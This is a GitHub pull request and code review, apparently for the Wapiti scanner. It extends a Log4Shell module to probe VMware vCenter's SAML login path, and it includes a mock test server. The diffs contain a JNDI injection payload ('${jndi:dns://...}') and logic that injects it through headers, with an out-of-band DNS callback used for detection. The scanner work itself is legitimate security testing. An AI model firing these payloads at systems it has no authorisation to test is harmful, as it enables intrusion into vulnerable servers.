### PR TITLE
Log4shell vsphere

### PR DESCRIPTION
**Pull request by JulienTD**
## Description
Improved the Log4Shell module to attack VMWare VCenter's log-in page.  
  
I have created a small Node.js server to reproduce the vSphere behavior and try this feature on it:
```js
const express = require('express')
const app = express()
const port = 3000


app.get('/', (req, res) => {
  res.status(200).send(`
  <html>
  <head>
    <title>Hello World!</title>
  </head>
  <body>
    <h1>Hello, World!</h1>
    <a href="/websso/SAML2/SSO/super_domain.com?SAMLRequest=blabla">hello</a>
  </body>
  </html>
`)
});

app.get('/websso/SAML2/SSO/:domain_client', (req, res) => {
  if (!req.query.SAMLRequest) {
    if (req.header("X-Forwarded-For")) {
      console.log("Exploit !");
      console.log(req.header("X-Forwarded-For"))
      res.status(200).json({"X-Forwarded-For": req.headers["X-Forwarded-For"]});
      return;
    }
  }
  res.status(200).json("Secured");
});

app.listen(port, () => {
  console.log(`App listening at http://localhost:${port}`)
});

```
Once the server is started, you can execute: `wapiti -u http://localhost:3000/ -m log4shell` and the server will print `Exploit` if it has worked.

## Related Issue(s)
#220

### CODE REVIEW

File: wapitiCore/attack/mod_log4shell.py [hunk 1]
```diff
@@ -95,14 +139,42 @@ async def _get_malicious_headers(self, headers: List[str]) -> Tuple[Dict, Dict]:
...
             batch_malicious_headers.append(malicious_header)
 
         return batch_malicious_headers, headers_uuid_record
 
+    def _inject_payload(
+        self,
+        original_request: Request,
+        params: List[Tuple[str, str]],
+    ) -> Tuple[Request, str, uuid.UUID]:
+        for idx in range(0, len(params)):
```
Comment (bretfourbe) [inline wapitiCore/attack/mod_log4shell.py:191]: use `enumerate` instead

File: wapitiCore/attack/mod_log4shell.py [hunk 2]
```diff
@@ -23,65 +25,145 @@ class ModuleLog4Shell(Attack):
...
+    VSPHERE_URL = "/websso/SAML2/SSO"
+
+
     def __init__(self, crawler, persister, attack_options, stop_event):
         Attack.__init__(self, crawler, persister, attack_options, stop_event)
-        if not self.is_valid_dns(attack_options.get("dns_endpoint")):
+        if not self._is_valid_dns(attack_options.get("dns_endpoint")):
             self.finished = True
+        else:
+            self.dns_host = socket.gethostbyname(self.dns_endpoint)
```
Comment (bretfourbe) [inline wapitiCore/attack/mod_log4shell.py:36]: this could be done in `_is_valid_dns` ?

File: wapitiCore/attack/mod_log4shell.py (hunk 1 above)
Comment (JulienTD) [reply wapitiCore/attack/mod_log4shell.py:191]: I don't use the param, I only use the idx

File: wapitiCore/attack/mod_log4shell.py (hunk 2 above)
Comment (JulienTD) [reply wapitiCore/attack/mod_log4shell.py:36]: yes, it's fixed

File: wapitiCore/attack/mod_log4shell.py [hunk 3]
```diff
@@ -173,12 +209,11 @@ def _generate_payload(self, unique_id: uuid.UUID) -> str:
         # but it is also using this syntax for the exploit.
         return "${jndi:dns://" + f"{self.dns_endpoint}/{unique_id}" + ".l}"
 
-    @staticmethod
-    def _is_valid_dns(dns_endpoint: str) -> str:
+    def _is_valid_dns(self, dns_endpoint: str) -> str:
```
Comment (devl00p) [inline wapitiCore/attack/mod_log4shell.py:212]: Fix annotation

File: wapitiCore/attack/mod_log4shell.py [hunk 4]
```diff
@@ -41,7 +42,34 @@ async def read_headers(self) -> List[str]:
...
+        except RequestError:
+            self.network_errors += 1
+            return
+        await self._verify_header_vulnerability(malicious_request, header_target, payload, payload_unique_id)
+
     async def attack(self, request: Request):
+        root_url = await self.persister.get_root_url()
+
+        if request.url == root_url:
+            await self.attack_vsphere_url(Request(root_url + ("" if root_url.endswith("/") else "/") + "ui/"))
```
Comment (devl00p) [inline wapitiCore/attack/mod_log4shell.py:70]: Breaks the test, you should use `persister.get_root_url.return_value = "http://..."` in test_mod_log4shell.py

File: wapitiCore/attack/mod_log4shell.py (hunk 3 above)
Comment (devl00p) [reply wapitiCore/attack/mod_log4shell.py:212]: and also the return type of `_get_malicious_headers` is not coherent with the one of `batch_malicious_headers`

File: wapitiCore/attack/mod_log4shell.py [hunk 5]
```diff
@@ -25,12 +25,13 @@ class ModuleLog4Shell(Attack):
 
     HEADERS_FILE = "log4shell_headers.txt"
 
+    VSPHERE_URL = "/websso/SAML2/SSO"
+
```
Comment (devl00p) [inline wapitiCore/attack/mod_log4shell.py:29]: Remove one empty line

**Review by devl00p — CHANGES_REQUESTED** [review]

File: wapitiCore/attack/mod_log4shell.py (hunk 3 above)
Comment (JulienTD) [reply wapitiCore/attack/mod_log4shell.py:212]: I removed the annotation because in the `_is_valid_dns` function, I modify the value of `_dns_host`.

Comment (devl00p) [reply wapitiCore/attack/mod_log4shell.py:211]: But the return type of `_is_valid_dns` should be `bool` not `str`

Comment (JulienTD) [reply wapitiCore/attack/mod_log4shell.py]: Yes you're right, it's fixed

**Review by bretfourbe — APPROVED** [review]

**Comment by tarraschk** [comment]
@devl00p can you have a look at the modifications?

**Comment by tarraschk** [comment]
Please do not merge this PR at the moment, we have additional checks to make.

@JulienTD : could you please try your PR on a real vulnerable vCenter machine?

File: wapitiCore/attack/mod_log4shell.py [hunk 6]
```diff
@@ -98,23 +125,31 @@ async def _verify_headers_vulnerability(
...
+        modified_request: Request,
+        header: str,
+        payload: str,
+        unique_id: uuid.UUID
+    ):
+        if await self._verify_dns(str(unique_id)) is True:
+            await self.add_vuln_critical(
+                category=NAME,
+                request=modified_request,
+                info=_("URL {0} seems vulnerable to Log4Shell attack by using the {1} {2}") \
```
Comment (bretfourbe) [inline wapitiCore/attack/mod_log4shell.py:141]: please check fr.po for translation issue

File: wapitiCore/attack/mod_log4shell.py [hunk 7]
```diff
@@ -41,10 +41,37 @@ async def read_headers(self) -> List[str]:
...
+            return
+        await self._verify_header_vulnerability(malicious_request, header_target, payload, payload_unique_id)
+
     async def attack(self, request: Request):
+        root_url = await self.persister.get_root_url()
+
+        if request.url == root_url:
+            await self.attack_vsphere_url(Request(root_url + ("" if root_url.endswith("/") else "/") + "ui/"))
+        if self.VSPHERE_URL in request.url:
+            await self.attack_vsphere_url(request)
```
Comment (bretfourbe) [inline wapitiCore/attack/mod_log4shell.py:71]: Can you change this to directly test `VSPHERE_URL` please ?

File: wapitiCore/attack/mod_log4shell.py (hunk 6 above)
Comment (JulienTD) [reply wapitiCore/attack/mod_log4shell.py:147]: done

File: wapitiCore/attack/mod_log4shell.py (hunk 7 above)
Comment (JulienTD) [reply wapitiCore/attack/mod_log4shell.py]: I changed the behavior to test the `VSPHERE_URL` on the root URL, and then try to exploit all the other URLs but without the `SPHERE_URL`. Do you prefer to add the `SPHERE_URL` to all the URLs?

**Comment by devl00p** [comment]
There is still a broken  test, otherwise it seems good to me

**Comment by tarraschk** [comment]
@JulienTD : could you fix the broken test ?

**Comment by tarraschk** [comment]
Replaced by https://github.com/wapiti-scanner/wapiti/pull/228

**Pull request closed without merging**